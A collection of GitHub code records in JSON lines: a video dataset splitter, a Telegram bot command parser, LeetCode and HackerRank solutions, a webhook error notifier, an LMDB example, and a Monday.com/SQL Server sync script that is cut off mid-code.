+{"seq_id":"70027054410","text":"import cv2\nimport os\nfrom PIL import Image\nfrom PIL import ImageFile\nImageFile.LOAD_TRUNCATED_IMAGES = True\n# location of dataset \n#video_path = '/c3d/C3D-Action-Recognition/datasets/ucf-101/'\nvideo_path = './datasets/ucf-101/'\nlabelnum=-1\nlabellist=[]\naction_list = os.listdir(video_path)\n# split dataset into train test and classifcation parts\nf1 = open('./ucfTrainTestlist/train_file.txt', 'w')\nf2 = open('./ucfTrainTestlist/test_file.txt', 'w')\nf3 = open('./ucfTrainTestlist/classInd.txt', 'w')\n#f1 = open('/c3d/C3D-Action-Recognition/ucfTrainTestlist/train_file.txt', 'w')\n#f2 = open('/c3d/C3D-Action-Recognition/ucfTrainTestlist/test_file.txt', 'w')\n#f3 = open('/c3d/C3D-Action-Recognition/ucfTrainTestlist/classInd.txt', 'w')\nfor action in action_list:\n video_list = os.listdir(video_path+action)\n prefixlist=[]\n labelnum+=1\n for video in video_list:\n prefix = video.split('.avi')[0] # if see first '.' then split the string\n if video.find('v_',0) == 0:\n prefix = prefix.replace('v_','')\n prefixlist.append(prefix)\n #label = prefix.split('_')[0]\n #print(label) \n \"\"\"\n if label not in labellist:\n labellist.append(label)\n labelnum+=1\n #print(prefix)\n f1.write(prefix+' '+str(labelnum)+'\\n')\n \"\"\"\n prefixlen=len(prefixlist)\n \n train = 0.8\n for i in range(int(prefixlen*0.8)):\n f1.write(prefixlist[i]+' '+str(labelnum)+'\\n')\n for i in range(int(prefixlen*0.8),prefixlen):\n f2.write(prefixlist[i]+' '+str(labelnum)+'\\n')\ni=1\nfor action in action_list:\n f3.write(str(i)+' '+action+'\\n')\n i+=1\n\"\"\"\n if not os.path.exists(save_path+action+'/'+prefix):\n os.mkdir(save_path+action+'/'+prefix)\n save_name = save_path + action + '/' + prefix + '/'\n #save_name = save_path + prefix + '/'\n video_name = video_path+action+'/'+video\n #print(video_name)\n name = video_name.split('.')[1]\n #print(name)\n\"\"\"\n","repo_name":"CHI-YU-SUNG/C3D-Action-Recognition","sub_path":"video2list.py","file_name":"video2list.py","file_ext":"py","file_size_in_byte":2006,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"16351775631","text":"from util import *\nimport commands\nimport admin\n\n\ndef perm_check(cmd, userid):\n return connect().execute('''\n SELECT EXISTS(SELECT 1 FROM perm WHERE\n ((rule = :w AND (cmd = 'ALL' OR cmd = :cmd) AND userid = :userid)) AND\n duration > (julianday('now')-2440587.5)*86400.0\n ) OR NOT EXISTS(SELECT 1 FROM perm WHERE\n ((rule = :b AND (cmd = 'ALL' OR cmd = :cmd) AND userid = :userid) OR\n (rule = :w AND (cmd = 'ALL' OR cmd = :cmd) AND userid != :userid)) AND\n duration > (julianday('now')-2440587.5)*86400.0\n )\n ''', {'cmd': cmd, 'userid': userid, 'w': PERM_W, 'b': PERM_B}).fetchone()[0]\n\n\ndef parse(bot, txt, buf, msg, is_ext=False):\n # silently ignore rate-limited users\n if msg.from_user.id != admin.userid and bot.ratelimit.get(msg.from_user.id, 0) >= commands.rate_threshold: return\n\n idx = 0\n part = ''\n parts = []\n parse = True\n total_rate = 0\n\n while idx <= len(txt):\n if not parse:\n part += ('' if txt[idx] in '\\\\|' else '\\\\') + txt[idx]\n parse = True\n elif idx == len(txt) or (is_ext and txt[idx] == '|'):\n part = connect().execute('''\n SELECT dest || substr(:s, length(src)+1) FROM alias\n WHERE :s = src OR :s LIKE src || ' %'\n UNION ALL SELECT :s\n ''', {'s': part.strip()}).fetchone()[0]\n cmd, args = part.split(None, 1) if ' ' in part or '\\n' in part else (part, None)\n if not hasattr(commands, 'cmd_'+cmd):\n return f'The command {cmd} does not exist.'\n if not perm_check(cmd, msg.from_user.id):\n return f'You do not have permission to execute the {cmd} command.'\n total_rate += commands.rate_penalty[int(commands.info[cmd]['weight'])]\n parts.append((getattr(commands, 'cmd_'+cmd), args))\n part = ''\n elif is_ext and txt[idx] == '\\\\': parse = False\n else: part += txt[idx]\n idx += 1\n\n total_rate += bot.ratelimit.get(msg.from_user.id, 0)\n if msg.from_user.id != admin.userid and total_rate > commands.rate_threshold:\n bot.ratelimit[msg.from_user.id] = commands.rate_threshold + 60\n return ('[rate limit exceeded, please wait at least 1min before sending additional commands]', {})\n bot.ratelimit[msg.from_user.id] = total_rate\n\n res = ''\n rflags = {}\n for (func, args) in parts:\n buf, flags = forcetuple(func(bot, msg, buf if args is None else args, buf))\n if 'stderr' in flags: res += flags['stderr'] + '\\n'\n if 'parse_mode' in flags: rflags['parse_mode'] = flags['parse_mode']\n return (res + buf, rflags)\n","repo_name":"tckmn/kipfa","sub_path":"src/parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":2661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"34138270933","text":"#\n# @lc app=leetcode id=739 lang=python3\n#\n# [739] Daily Temperatures\n#\n# https://leetcode.com/problems/daily-temperatures/description/\n#\n# algorithms\n# Medium (60.04%)\n# Total Accepted: 76.7K\n# Total Submissions: 127.4K\n# Testcase Example: '[73,74,75,71,69,72,76,73]'\n#\n# \n# Given a list of daily temperatures T, return a list such that, for each day\n# in the input, tells you how many days you would have to wait until a warmer\n# temperature. If there is no future day for which this is possible, put 0\n# instead.\n# \n# For example, given the list of temperatures T = [73, 74, 75, 71, 69, 72, 76,\n# 73], your output should be [1, 1, 4, 2, 1, 1, 0, 0].\n# \n# \n# Note:\n# The length of temperatures will be in the range [1, 30000].\n# Each temperature will be an integer in the range [30, 100].\n# \n#\n\n# naive approach\n# def dailyTemperatures(self, T):\n# n = len(T)\n# res = [0]*n\n# for i in range(n):\n# for j in range(i+1, n):\n# if T[j] > T[i]:\n# res[i] = j-i\n# break\n# return res\n\nfrom collections import Counter\nfrom functools import reduce\nclass Solution:\n # def dailyTemperatures(self, T: List[int]) -> List[int]:\n\n def dailyTemperatures3(self, T):\n ans = [0] * len(T)\n stack = [] #indexes from hottest to coldest\n for i in range(len(T) - 1, -1, -1):\n while stack and T[i] >= T[stack[-1]]:\n stack.pop()\n if stack:\n print('update i=', i, 'stack=', stack)\n ans[i] = stack[-1] - i\n stack.append(i)\n print('i=', i, 'stack=', stack)\n return ans\n\n def dailyTemperatures2(self, T):\n n = len(T)\n res = [0]*n\n for i in range(n):\n for j in range(i+1, n):\n if T[j] > T[i]:\n res[i] = j-i\n break\n return res\n\n def dailyTemperatures(self, T):\n c = Counter(T)\n # print(c)\n s = sorted([[k, v] for k, v in c.items()])\n # print(s)\n for i in range(1, len(s)):\n # print(i)\n # print(s[i])\n s[i][1] += s[i-1][1]\n # print(s)\n percentile = dict(s)\n # print(percentile)\n n = len(T)\n res = [0] * n\n \n def method1(i):\n for j in range(i+1, n):\n if T[j] > T[i]:\n return j - i\n return 0\n d = {}\n for i in range(n):\n if T[i] not in d:\n d[T[i]] = [i]\n else:\n d[T[i]].append(i)\n # print(d)\n order = [x[0] for x in s]\n # print(order)\n def method2(i):\n min_ = float('inf')\n for j in range(order.index(T[i])+1, len(s)):\n # print('here')\n for idx in d[order[j]]:\n if idx > i:\n if idx < min_:\n min_ = idx\n if min_ < float('inf'):\n return min_ - i\n else:\n return 0\n cut = int(n*0.9)\n for i in range(n):\n if percentile[T[i]] < cut:\n res[i] = method1(i)\n else:\n res[i] = method2(i)\n return res\ns = Solution()\nT = [73, 74, 75, 71, 69, 72, 76, 73]\nprint(s.dailyTemperatures3(T))\n# print(s.dailyTemperatures(T) == s.dailyTemperatures2(T))\n# T = [34,80,80,34,34,80,80,80,80,34]\n\n# print(s.dailyTemperatures(T))\n\n\n\n\n# print(s.dailyTemperatures(T) == s.dailyTemperatures2(T))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"nickyfoto/lc","sub_path":"python/739.daily-temperatures.py","file_name":"739.daily-temperatures.py","file_ext":"py","file_size_in_byte":3551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"32915493674","text":"from threading import Timer\r\nimport requests, json, logging, falcon\r\n\r\nLOGGER = logging.getLogger()\r\nLOGGER.setLevel(\"INFO\")\r\n\r\nclass SpaceNotifier:\r\n def __init__(self, webhook, debounce_time = 10, env=\"stagging\", silent = 10):\r\n self.notifications = {}\r\n self.__debounce_time = debounce_time\r\n self.__webhook = webhook\r\n self.__env = env\r\n self.__silent = {}\r\n self.__silent_threshold = silent\r\n self.__silent_general = []\r\n \r\n def __getMessage(self, etl):\r\n notif_type = {}\r\n for type in self.notifications[etl]['message']: #check how many time each type error happened\r\n if type not in notif_type:\r\n notif_type[type] = 1\r\n else:\r\n notif_type[type] += 1\r\n message = f\"Error occured on {etl} *{self.__env}*, error: \"\r\n\r\n for type in notif_type:\r\n message = f\"{message}\\n\\t- {type} : {notif_type[type] if notif_type[type] < self.__silent_threshold else f'{self.__silent_threshold-1}++'} time(s) raised.\"\r\n\r\n if(notif_type[type] >= self.__silent_threshold): # if one of error equal or more than silent threshold, then add it to silenced alert\r\n if etl not in self.__silent:\r\n self.__silent[etl] = []\r\n \r\n self.__silent[etl].append(type)\r\n message = f\"{message} \\n\\t\\t- *Occured too often, will be silenced till restart!*\"\r\n \r\n return f\"{message}\\nFor more detail, please check ELK.\"\r\n\r\n def send(self, etl, message):\r\n job = {\r\n \"message\" : [message],\r\n \"thread\" : None,\r\n }\r\n \r\n\r\n if \"with-param\" in etl:\r\n uris = etl.split(\"?\")\r\n uri = uris[0]\r\n query_param = uris[1] # keep param -> send email maybe ?\r\n\r\n etl = uri\r\n\r\n if etl in self.__silent:\r\n if message in self.__silent[etl]:\r\n # if error is silenced, then do not do anything\r\n return\r\n\r\n if etl in self.notifications and 'thread' in self.notifications[etl]:\r\n # if etl already scheduled for alerting, then cancel and debounce\r\n self.notifications[etl]['thread'].cancel()\r\n \r\n job['message'] = self.notifications[etl]['message'] + job[\"message\"] # append eror message \r\n self.notifications[etl] = {} \r\n \r\n self.notifications[etl] = job\r\n\r\n def __debounce(etl, message):\r\n try:\r\n self.notifications[etl] = {}\r\n response = requests.post(self.__webhook, data=json.dumps({\"text\":message}))\r\n if response.status_code != 200:\r\n LOGGER.error(str(e))\r\n except Exception as e:\r\n LOGGER.error(str(e))\r\n\r\n self.notifications[etl]['thread'] = Timer(self.__debounce_time, __debounce,args=[etl, self.__getMessage(etl)] )\r\n self.notifications[etl]['thread'].start()\r\n\r\n\r\n\r\n def __getTypedMessage(self, type):\r\n etl_counts = {}\r\n for etl in self.notifications[type]['etls']: #check how many time each type error happened\r\n if etl not in etl_counts:\r\n etl_counts[etl] = 1\r\n else:\r\n etl_counts[etl] += 1\r\n\r\n message = f\"Error occured while doing *{type.upper()}* on *{self.__env}* : \"\r\n\r\n for etl in etl_counts:\r\n message = f\"{message}\\n\\t- {etl} : {etl_counts[etl] if etl_counts[etl] < self.__silent_threshold else f'{self.__silent_threshold-1}++'} time(s) raised.\"\r\n\r\n if(etl_counts[etl] >= self.__silent_threshold): # if one of error equal or more than silent threshold, then add it to silenced alert\r\n if etl not in self.__silent_general:\r\n self.__silent_general.append(etl)\r\n \r\n self.__silent_general.append(etl)\r\n message = f\"{message} \\n\\t\\t- *Occured too often, will be silenced till restart!*\"\r\n \r\n return f\"{message}\\nFor more 
detail, please check ELK.\"\r\n \r\n def sendTyped(self, etl, type=\"ETL\" , debounce = None):\r\n \"\"\"\r\n This function will debounce an error space alert. \r\n The error is categorized as two categories, ETL and Non-ETL (recoveries:red)\r\n If no input until debounce is expired then it'll send message to Space\r\n \"\"\"\r\n\r\n # remove unnecessary query parameter, take only endpoint\r\n uris = etl.split(\"?\") \r\n etl = uris[0]\r\n\r\n jobs = {\r\n \"etls\" : [etl],\r\n \"thread\" : None,\r\n }\r\n\r\n\r\n if etl in self.__silent_general:\r\n return # if silenced then do nothing\r\n \r\n if type in self.notifications and 'thread' in self.notifications[type]:\r\n # if already scheduled, then debounce (cancel and restart)\r\n self.notifications[type]['thread'].cancel()\r\n\r\n jobs['etls'].extend(self.notifications[type]['etls'])\r\n self.notifications[type] = {} \r\n \r\n self.notifications[type] = jobs\r\n\r\n def __debounce(type, message):\r\n try:\r\n self.notifications[type] = {}\r\n response = requests.post(self.__webhook, data=json.dumps({\"text\":message}))\r\n if response.status_code != 200:\r\n LOGGER.error(str(e))\r\n except Exception as e:\r\n LOGGER.error(str(e))\r\n\r\n self.notifications[type]['thread'] = Timer(self.__debounce_time if debounce == None else debounce, __debounce,args=[type, self.__getTypedMessage(type)] )\r\n self.notifications[type]['thread'].start()\r\n \r\n\r\nclass test(object):\r\n def on_post(self, req, resp):\r\n resp.status = falcon.HTTP_200\r\n data = {'status': 'unavailable service'}\r\n resp.body = json.dumps(data)\r\n\r\n def on_get(self, req, resp):\r\n resp.status = falcon.HTTP_200\r\n content = str(1/0)\r\n data = {'status': 'success', 'content': content, 'enum': '1'}\r\n resp.body = json.dumps(data)","repo_name":"rasyid-abe/etl_datamart","sub_path":"notification.py","file_name":"notification.py","file_ext":"py","file_size_in_byte":6118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"40350304065","text":"\"\"\"\nYou are given a set A and n other sets.\nYour job is to find whether set A is a strict superset of each of the N sets.\nPrint True, if A is a strict superset of each of the N sets. Otherwise, print False.\nA strict superset has at least one element that does not exist in its subset.\n\nExample\nSet ([1,3,4]) is a strict superset of set ([1,3]).\nSet ([1,3,4]) is not a strict superset of set ([1,3,4]).\nSet ([1,3,4]) is not a strict superset of set ([1,3,5]).\n\nInput Format\nThe first line contains the space separated elements of set A.\nThe second line contains integer n, the number of other sets.\nThe next n lines contains the space separated elements of the other sets.\n\nOutput Format\nPrint True if set A is a strict superset of all other N sets. Otherwise, print False.\n\nSample Input:\n1 2 3 4 5 6 7 8 9 10 11 12 23 45 84 78\n2\n1 2 3 4 5\n100 11 12\n\nSample Output:\nFalse\n\nExplanation:\nSet A is the strict superset of the set ([1,2,3,4,5]) but not of the set ([100,11,12]) because 100 is not in set A.\nHence, the output is False.\n\"\"\"\n\"\"\"\nExplanation of the solution code:\nIn Python, the > operator is used to check if a set is a strict superset of another set. \nIf all elements of the second set are in the first set, \nand the first set has at least one element that the second set doesn't have, \nA > B returns True. Otherwise, it returns False.\n\"\"\"\nA = set(map(int, input().split()))\nnum_other_sets = int(input())\n\nis_strict_superset = True\nfor _ in range(num_other_sets):\n other_set = set(map(int, input().split()))\n if not (A > other_set):\n is_strict_superset = False\n break\n\nprint(is_strict_superset)\n","repo_name":"CihatAcar/HackerRank-Python-Exercises","sub_path":"Sets/check_strict_superset.py","file_name":"check_strict_superset.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"17872540326","text":"# Вывести кол-во гласных букв в предложекние введеных пользователем.\nvowels = ['a', 'e', 'i', 'o', 'u'] # список гласных букв\nword = input(\"Provide a word to search for vowels: \") # запрос предложения, слова\nfound = {} # словарь\n\nfound['a'] = 0\nfound['e'] = 0\nfound['i'] = 0\nfound['o'] = 0\nfound['u'] = 0\n\nfor letter in word: # перебор букв в слове\n\tif letter in vowels: # если буква глассная\n\t\tfound[letter] += 1 # +1 буква\n\nfor k, v in sorted(found.items()): # ключ и значение \n\tprint(k, 'was found', v, 'time(s).') # буква ее кол-во\n","repo_name":"Lumaks42/codePythonStart","sub_path":"vowels_improvement.py","file_name":"vowels_improvement.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"38056070411","text":"class Solution:\n def isIsomorphic(self, s: str, t: str) -> bool:\n print(f\"{s} - {t}\")\n replacements = {}\n if len(s) != len(t):\n return False\n for s_char, t_char in zip(s, t):\n print(f\"{s_char} \", end=\"\")\n if s_char in replacements:\n print(f\"found replacement {replacements[s_char]}\")\n if replacements[s_char] != t_char:\n print(\"False\")\n return False\n else:\n if t_char not in replacements.values():\n print(f\"no replacement, adding {s_char}: {t_char}\")\n replacements[s_char] = t_char\n else:\n print(f\"{t_char} already used as replacement\")\n print(\"False\")\n return False\n print(\"True\")\n return True\n\n\ninputs = [(\"egg\", \"add\"), (\"badc\", \"baba\"), (\"foo\", \"bar\"), (\"bbbaaaba\", \"aaabbbba\")]\nexpected = [True, False, False, False]\n\nresults = []\nfor i in inputs:\n sol = Solution()\n results.append(sol.isIsomorphic(i[0], i[1]))\n\nprint(expected)\nprint(results)\nprint(expected == results) \n\n","repo_name":"woodroww/algorithms","sub_path":"leetcode/isomorphic_strings_205.py","file_name":"isomorphic_strings_205.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"4141631606","text":"#! /usr/bin/env python3\n# -*- coding: utf-8 -*-\n# File : lmdb-single.py\n# Author : Jiayuan Mao\n# Email : maojiayuan@gmail.com\n# Date : 01/17/2023\n#\n# This file is part of Jacinle.\n# Distributed under terms of the MIT license.\n\nfrom jacinle.storage.kv.lmdb import LMDBKVStore\n\n\ndef main():\n kv = LMDBKVStore('/tmp/test_1.lmdb', readonly=False)\n\n with kv.transaction():\n kv['a'] = 1\n kv['b'] = 2\n\n assert 'a' in kv and kv['a'] == 1\n assert 'b' in kv and kv['b'] == 2\n assert 'c' not in kv\n\n for k in kv.keys():\n print(k, kv[k])\n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"vacancy/Jacinle","sub_path":"examples/kv-lmdb/lmdb-single.py","file_name":"lmdb-single.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","stars":122,"dataset":"github-code","pt":"16"}
+{"seq_id":"22925740294","text":"# Monday and Local SQL server intagration\n# Written by: Anthony Bradt 613-986-0029\n# Requested by: Victoria Hurrell, Hated by: Christan Slain\n\nimport requests\nimport json\nimport pyodbc\nimport pandas as pd\nimport time\n\napiKey = \"XXX\"\napiUrl = \"https://api.monday.com/v2\"\nheaders = {\"Authorization\": apiKey}\n\ncnxn = pyodbc.connect(\"Driver={SQL Server Native Client 11.0};\"\n \"Server=XXX;\"\n \"Database=XXX;\"\n \"Trusted_Connection=yes;\")\n\n#Add SQL Read Query here: \n#SQLQR = \"SELECT\tstt.sttDescription as 'Status' ,ord.ordSchedShipDate ,ord.ordCustRequestDate as 'Production Completion'\t,sales.ordavValue as 'Designer'\t,ord.ordPONumber as 'Sales Order 3'\t,cust.venCompanyName as 'Customer Name',ord.ordDescription FROM dbo.Orders ord LEFT JOIN dbo.OrderStatuses stt on stt.sttID = ord.sttID LEFT JOIN dbo.OrderAttributeValues sales on sales.ordID = ord.ordID AND sales.atbID = 64 LEFT JOIN dbo.Organizations cust on cust.venID = ord.venID WHERE ord.ordCreatedDateTime > '2019-01-01' AND cust.vencompanyName NOT LIKE 'Test Customer' AND ord.ordPONumber NOT LIKE '0000%' AND sales.ordavValue = 'Heather Tardioli' \"\n\n#Must match Desingers names with Board ID\nDesigners = [\"Elnaz Shahrokhi\" ,\"Kaitlyn North\" ,\"Heather Tardioli\" ,\"Wael Bakr\" ,\"Aviva Ben-Choreen\" ,\"Janet Spencer\" ,\"Karley Scrivens\" ,\"Kimberly Silcox\" ,\"Ola Elmaghraby\" ,\"Sarah Clifford\" ,\"Victoria Campbell\" ,\"Caroline Castrucci\" ,\"Corey Laurysen\" ,\"Zeina Agha\", \"Jinan Al-Ani\"]\nBoardID = [\"840778743\" ,\"840784633\" ,\"840780676\" ,\"840788263\" ,\"701886327\" ,\"840782335\" ,\"840785291\" ,\"840786638\" ,\"840787425\" ,\"840792017\" ,\"840789036\" ,\"840785983\" ,\"845011609\" ,\"840791247\", \"840783457\"]\nStats = [\"Cancelled\",\"Shipped\",\"Completed\",\"Available for Confirmation\",\"Available to Schedule\",\"Blank5\",\"Confirmation Notification\",\"Copy\",\"Design Import\",\"In Production\",\"Invoiced\",\"Left CP\",\"PO Needed\",\"Scheduled\",\"Review for Scheduling\",\"Service Schedulable\",\"Ready to Ship\",\"Ready to Ship CP\",\"Material List Available\",\"Nested\",\"Left Carleton Place\"]\n#Hard coded Status, order matters very much, must match monday's side\nprint(len(Stats))\n\n\"\"\" \n'Cancelled', 'value': '{\"index\":0}'\n'Shipped', 'value': '{\"index\":1}'},\n'Completed', 'value': '{\"index\":2}'},\n'Available for Confirmation', 'value': '{\"index\":3}'}\n'Available to Schedule', 'value': '{\"index\":4}'},\n'Confirmation Notification', 'value': '{\"index\":6}'}\n'Copy', 'value': '{\"index\":7}'}\n'Design Import', 'value': '{\"index\":8}'},\n'In Production', 'value': '{\"index\":9}'}\n'Invoiced', 'value': '{\"index\":10}'},\n'Left CP', 'value': '{\"index\":11}'},\n'PO Needed', 'value': '{\"index\":12}'}\n'Scheduled', 'value': '{\"index\":13}'}\n'Review For Scheduling', 'value': '{\"index\":14}'}\n\"\"\"\n \ndef SQLRead(Des): #Pass Designer name to SQL, Return Full SQL read\n try:\n SQLQR = \"SELECT\tstt.sttDescription as 'Status' ,ord.ordSchedShipDate ,ord.ordCustRequestDate as 'Production Completion'\t,sales.ordavValue as 'Designer'\t,ord.ordPONumber as 'Sales Order 3'\t,cust.venCompanyName as 'Customer Name',ord.ordDescription, processor.ordavValue as 'Processor', ord.ordOrderDate FROM dbo.Orders ord LEFT JOIN dbo.OrderStatuses stt on stt.sttID = ord.sttID LEFT JOIN dbo.OrderAttributeValues sales on sales.ordID = ord.ordID AND sales.atbID = 64 LEFT JOIN dbo.OrderAttributeValues processor on processor.ordID = ord.ordID AND 
processor.atbID = 75 LEFT JOIN dbo.Organizations cust on cust.venID = ord.venID WHERE ord.ordCreatedDateTime > DATEADD(year,-1,GETDATE()) AND cust.vencompanyName NOT LIKE 'Test Customer' AND ord.ordpoNumber NOT LIKE '%-D' AND ord.ordPONumber NOT LIKE '0000%' AND sales.ordavValue = '\"\n SQLQR += Des\n SQLQR += \"'\"\n df = pd.read_sql(SQLQR, cnxn)\n return df\n except: #If Failed, Try again. Bandain for timeout SQL Requests\n print(\"SQL failed\")\n SQLRead(Des)\n \ndef STRClean(CleanME): #Removes Extra char on Strings\n CleanME = str(CleanME)\n CleanME = CleanME[2:-2]\n return CleanME\n \ndef CheckSTR(ID,Data): \n Data = str(Data)\n ID = str(ID)\n ID += '\"'\n #print(ID)\n if ID in Data:\n return 1\n else:\n return 0\n \ndef CheckSTROld(ID,Data):\n Data = str(Data)\n ID = str(ID)\n #print(ID)\n if ID in Data:\n return 1\n else:\n return 0\n\ndef MonQuery(BID): #Takes Monday Board ID, returns that boards items \n #'query {boards (ids: 695573207){items{name column_values{title id value}}}}'\n query = 'query {boards (ids:'\n query += BID\n query += '){items{name id column_values{title id value}}}}'\n data = {'query' : query}\n r = requests.post(url=apiUrl, json=data, headers=headers) # make request\n x = r.json()\n # print(r)\n return x\n\ndef SQLToMon(FullQ,SID,BID): #Takes SQL Data, breakes in into parts and passes it to Funtion WriteMon\n Status = FullQ['Status'] #Sperates each line item\n ShipDate = FullQ['ordSchedShipDate']\n ProdComp = FullQ['Production Completion']\n Design = FullQ['Designer']\n Item = FullQ['Customer Name']\n Descrip = FullQ['ordDescription']\n OrdDate = FullQ['ordOrderDate']\n Process = FullQ['Processor']\n Process = STRClean(Process.values) #Cleans each item \n Status = STRClean(Status.values)\n ShipDate = DateClean(ShipDate) #Dates and STR use diffrent Clean functions\n ProdComp = DateClean(ProdComp)\n OrdDate = DateClean(OrdDate)\n Design = STRClean(Design.values)\n Item = STRClean(Item.values)\n Descrip = STRClean(Descrip.values)\n print(Item,SID,Status,Descrip,ShipDate,ProdComp,Design,BID,OrdDate,Process)\n WriteMon(Item,SID,Status,Descrip,ShipDate,ProdComp,Design,BID,OrdDate,Process)\n return 0\n \ndef DateClean(Date):\n Date = str(Date)\n Date = Date.split(\"Name:\",1)[0]\n Date = Date[4:]\n Date = Date.replace(\" \",\"\")\n Date = Date.replace(\"\\n\",\"\")\n return Date\n\ndef WriteMon(Item,SID,Status,Descrip,ShipDate,ProdComp,Design,BID,OrdDate,Process):\n IID = MakeItem(BID,Item)\n IID = CleanID(str(IID))\n print(IID)\n ChangeItemValues(BID,IID,\"text_1\",DoubleDump(SID))\n ChangeItemValues(BID,IID,\"text\",DoubleDump(Descrip))\n ChangeItemValues(BID,IID,\"text7\",DoubleDump(Process))\n ChangeItemValues(BID,IID,\"text1\",DoubleDump(Design))\n ChangeItemValues(BID,IID,\"date\",DateDump(ProdComp))\n ChangeItemValues(BID,IID,\"date4\",DateDump(ShipDate))\n ChangeItemValues(BID,IID,\"date1\",DateDump(OrdDate))\n print(Status)\n for z in range(len(Stats)):\n if CheckSTROld(Stats[z],Status):\n ChangeItemValues(BID,IID,\"status\",StatDump(z))\n \n \n # ChangeItemValues(BID,IID,\n return 0\n \ndef StatDump(Value):\n VStat = '{\"index\":%s}'%(Value)\n VStat = json.dumps(VStat)\n return VStat\n \ndef DoubleDump(Value):\n Value = json.dumps(json.dumps(Value))\n return Value\n \ndef DateDump(Value):\n VDate = '{\"date\": \"%s\"}'%(Value)\n VDate = json.dumps(VDate)\n return VDate\n \ndef MakeItem(ID,Item):\n Item = str(Item)\n query = 'mutation { create_item (board_id:'\n query += ID\n query += ', group_id: \"topics\", item_name:\"'\n query += Item\n query += '\") { 
id } }'\n data = {'query' : query}\n r = requests.post(url=apiUrl, json=data, headers=headers) # make request\n print (r)\n return (r.json());\n # return r\n\ndef CleanID(NotCleanID):\n print(\"To be Cleaned:\" + NotCleanID)\n NotCleanID = NotCleanID.split(\"'id':\",1)[1]\n NotCleanID = NotCleanID.split(\"}}\",1)[0]\n NotCleanID = NotCleanID.replace(\"'\",\"\")\n NotCleanID = NotCleanID.replace(\" \",\"\")\n return NotCleanID\n \ndef CleanItemID(ItemID):\n ItemID = ItemID.split(\"'id':\",1)[1]\n ItemID = ItemID.split(\"'column_values':\",1)[0]\n ItemID = ItemID.replace(\"'\",\"\")\n ItemID = ItemID.replace(\",\",\"\")\n ItemID = ItemID.replace(\" \",\"\")\n return ItemID\n \n\"\"\"\ntext_1 - sales order#\ntext - Description\nstatus - Production status\ndate4 - Sched Ship date\ndate - Production completion\nperson - Desginers\n\"\"\"\n\ndef ChangeItemValues(BID,IID,CID,Value):\n try:\n print (\"Flag: 0\")\n query = str('mutation {change_column_value(board_id:%s, item_id:%s,column_id:\"%s\",value:%s){id}}'%(BID,IID,CID,Value))\n print (query)\n data = {'query' : query}\n print (\"Flag: 1\")\n r = requests.post(url=apiUrl, json=data, headers=headers, timeout=240) # make request\n print (\"Flag: 2\")\n return (r.json());\n except:\n print(\"failed\")\n print(BID)\n print(IID)\n print(CID)\n print(Value)\n\n\"\"\"\ndef FindWon(json_data):\n data_dict = dict(json_data)\n won_list = []\n if (\"data\" in data_dict.keys()):\n dict1 = data_dict[\"data\"]\n if (\"boards\" in dict1.keys()):\n for item in dict1[\"boards\"]:\n if (\"items\" in item.keys()):\n for i in item[\"items\"]:\n if (\"column_values\" in i.keys()):\n for ix in i[\"column_values\"]:\n if (\"value\" in ix.keys()):\n if (\"61557-D\" in ix[\"value\"]):\n won_list.append(i)\n return (won_list);\nprint(type(MonQuery(\"695573207\")))\nprint(FindWon(MonQuery(\"695573207\")))\n\"\"\"\n\nlvals = []\ndef rec_won(data,key,reg,depth): #Majic Sause, This burger aint the same without it. 
Credits:Kyle Lawrynuik \n flag = []\n new_flag = []\n global lvals\n if isinstance(data, dict):\n try:\n if (reg == str(data[key])):\n flag.append(depth)\n except KeyError as e:\n pass\n for element in data:\n for el in rec_won(data[element],key,reg,depth):\n flag.append(el)\n if isinstance(data, list):\n for element in data:\n for el in rec_won(element,key,reg,depth):\n flag.append((el))\n for element in flag:\n if(element>0):\n new_flag.append(element-1)\n if(element==0):\n #print(data)\n lvals.append(data)\n return new_flag\n\n\"\"\"\ninput(\"part 0 -- Testing \")\nlvals = []\ndata = MonQuery(\"695573207\")\nprint(type(data))\n#print(data)\nsalesOrderID = \"63020\"\nsalesOrderID = json.dumps(salesOrderID)\nrec_won(data=dict(data),key=\"value\",reg=salesOrderID,depth=2)\nprint(lvals)\n\n\"\"\"\n\n\n#Main \ninput(\"Part 1 -- Add missing items to monday\")\ncount = 0\nfor x in Designers: #Run through for each designer\n print(x)\n # input(\"Enter to continue\")\n time.sleep(60)\n df = SQLRead(x) #Runs preset SQL Query for the designers name \n print(df) #Prints SQL Query using pandas\n print(BoardID[count]) \n MonData = MonQuery(BoardID[count])#Takes hard coded desingers board ID and returns Monday Items \n print(MonData)\n \n for y in df.index:#For every item returned by the SQL Query\n time.sleep(1)\n TestDF = df.loc[[y]] #Pass just one item at a time\n print(TestDF)\n SalesDF = TestDF['Sales Order 3'] #Isolate Sales Order number\n SalesID = STRClean(SalesDF.values)#Clean Sales Order number\n print(SalesID)\n \n if CheckSTR(SalesID,MonData) == 0: #Check if Sales Order number is anywhere in the monday board\n print(\"passing SQL to Monday\")\n print(df.loc[y])\n SQLToMon(df.loc[[y]],SalesID,BoardID[count]) #Passes SQL item to be written to Monday.com \n \n else: #Item already exist in monday\n lvals = [] #Preforms the same as SQLToMon, should be a function of its own\n SalesID = json.dumps(SalesID)\n rec_won(data=dict(MonData),key=\"value\",reg=SalesID,depth=2)\n ItemID = CleanItemID(str(lvals))\n Status = TestDF['Status']\n Status = STRClean(Status.values)\n ProdDate = TestDF['Production Completion']\n SchedDate = TestDF['ordSchedShipDate']\n SchedDate = DateClean(SchedDate)\n ProdDate = DateClean(ProdDate)\n for z in range(len(Stats)):\n if CheckSTROld(Stats[z],Status):\n 